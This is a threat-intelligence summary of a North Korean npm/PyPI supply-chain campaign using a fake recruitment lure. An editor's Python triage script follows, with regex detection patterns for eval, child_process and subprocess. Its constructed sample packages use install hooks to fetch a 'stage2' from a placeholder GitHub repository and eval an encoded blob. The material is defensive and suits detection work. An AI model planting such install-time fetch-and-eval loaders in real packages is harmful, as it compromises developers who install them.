Inside the fake crypto developer recruitment hack
ID: 97db35fc-d341-5664-b1d3-00e72fdec46b
STIX ID: report--97db35fc-d341-5664-b1d3-00e72fdec46b
Feed Name: ReversingLabs Blog
ReversingLabs published a technical analysis of an active software supply-chain campaign, tracked as "graphalgo" and attributed to the North Korean Lazarus Group, that distributes a remote-access trojan through roughly 192 malicious npm and PyPI packages. The packages use staged encrypted payloads whose decryption keys are derived from arguments passed to the loader's constructor, GitHub-hosted artifacts that reveal the C2 endpoints (a dead-drop resolver pattern), and cleanup routines that remove evidence after execution. Delivered under a fake crypto developer recruitment lure, the campaign targets JavaScript and Python developers and was still ongoing at the time of publication.
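The summary names the behaviours that make such packages stand out before the payload ever decrypts: code that runs automatically at install time, a fetch from a GitHub-hosted artifact, a large encoded blob, and dynamic execution of decoded data. The following triage script, added here as an editor's example and not ReversingLabs' tooling, scans a package's manifest and source files for those generic patterns and returns a verdict. The regexes, the `example-org/example-repo` URLs and the sample packages are constructed for illustration; they are not indicators from the graphalgo campaign, and the heuristics will flag some legitimate packages that fetch assets during install.

```python
"""Heuristic triage of npm/PyPI package contents for loader-style behaviour.

Added example (not ReversingLabs' code). Indicators are generic patterns chosen
by the editor, not campaign IOCs; expect false positives on packages that
legitimately download assets in install hooks.
"""
from __future__ import annotations

import json
import re
from dataclasses import dataclass

# npm lifecycle scripts that execute automatically when the package is installed.
NPM_INSTALL_HOOKS = {"preinstall", "install", "postinstall", "prepare"}
GITHUB_FETCH_RE = re.compile(
    r"https?://(?:raw\.githubusercontent\.com|gist\.githubusercontent\.com|github\.com)/[^\s\"']+"
)
ENCODED_BLOB_RE = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")  # long base64-looking runs
DYNAMIC_EXEC_RE = re.compile(
    r"\b(?:eval|exec|Function|vm\.runInThisContext|child_process|subprocess|os\.system)\b"
)
# setup.py overriding a setuptools command so arbitrary code runs on `pip install`.
PY_SETUP_HOOK_RE = re.compile(r"cmdclass\s*=|class\s+\w+\((?:install|develop|egg_info)\)")


@dataclass
class Finding:
    kind: str
    detail: str


def scan_package_json(text: str) -> list[Finding]:
    """Flag npm lifecycle scripts that run without the developer invoking them."""
    try:
        manifest = json.loads(text)
    except json.JSONDecodeError as exc:
        return [Finding("unparseable-manifest", str(exc))]
    scripts = manifest.get("scripts") or {}
    return [Finding("install-hook", f"{hook}: {scripts[hook]}")
            for hook in sorted(NPM_INSTALL_HOOKS & set(scripts))]


def scan_source(filename: str, text: str) -> list[Finding]:
    """Flag GitHub fetches, large encoded blobs, dynamic execution and setup.py hooks."""
    findings = [Finding("github-fetch", f"{filename}: {m.group(0)}")
                for m in GITHUB_FETCH_RE.finditer(text)]
    findings += [Finding("encoded-blob", f"{filename}: {len(m.group(0))}-char blob")
                 for m in ENCODED_BLOB_RE.finditer(text)]
    findings += [Finding("dynamic-exec", f"{filename}: {m.group(0)}")
                 for m in DYNAMIC_EXEC_RE.finditer(text)]
    if filename.endswith("setup.py") and PY_SETUP_HOOK_RE.search(text):
        findings.append(Finding("install-hook", f"{filename}: custom setuptools command"))
    return findings


def triage(files: dict[str, str]) -> dict:
    """Map {path: contents} to a verdict: an install hook combined with any
    fetch/blob/exec indicator is 'suspicious'; lone indicators are 'review'."""
    findings: list[Finding] = []
    for name, text in files.items():
        findings += scan_package_json(text) if name.endswith("package.json") else scan_source(name, text)
    kinds = {f.kind for f in findings}
    if "install-hook" in kinds and kinds & {"github-fetch", "encoded-blob", "dynamic-exec"}:
        verdict = "suspicious"
    elif kinds:
        verdict = "review"
    else:
        verdict = "clean"
    return {"verdict": verdict, "findings": findings}


# Constructed samples (hypothetical packages, not real artifacts).
SUSPICIOUS_NPM = {
    "package.json": json.dumps({"name": "example-pkg", "version": "1.0.0",
                                "scripts": {"postinstall": "node lib/setup.js"}}),
    "lib/setup.js": (
        'const https = require("https");\n'
        'const { execSync } = require("child_process");\n'
        'const BLOB = "' + "A" * 240 + '";\n'  # stand-in for an encrypted stage
        'https.get("https://raw.githubusercontent.com/example-org/example-repo/main/config.json", () => {});\n'
        'eval(Buffer.from(BLOB, "base64").toString());\n'
    ),
}
SUSPICIOUS_PYPI = {
    "setup.py": (
        "from setuptools import setup\n"
        "from setuptools.command.install import install\n"
        "import urllib.request, subprocess\n"
        "class PostInstall(install):\n"
        "    def run(self):\n"
        "        install.run(self)\n"
        '        urllib.request.urlopen("https://raw.githubusercontent.com/example-org/example-repo/main/stage2.bin")\n'
        'setup(name="example-pkg", cmdclass={"install": PostInstall})\n'
    ),
}
BENIGN_NPM = {
    "package.json": json.dumps({"name": "add-two", "version": "1.0.0", "scripts": {"test": "jest"}}),
    "index.js": "module.exports = function add(a, b) { return a + b; };\n",
}

if __name__ == "__main__":
    for label, pkg in [("npm", SUSPICIOUS_NPM), ("pypi", SUSPICIOUS_PYPI), ("benign", BENIGN_NPM)]:
        result = triage(pkg)
        print(label, result["verdict"], [f"{f.kind}: {f.detail}" for f in result["findings"]])
```

The verdict rule is deliberately conjunctive: install-time execution alone is common in legitimate packages, and a GitHub fetch alone is common in build scripts, but the two together in a package that also carries a large opaque blob or calls `eval`/`exec` is the shape the summary describes and is worth pulling for manual review.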
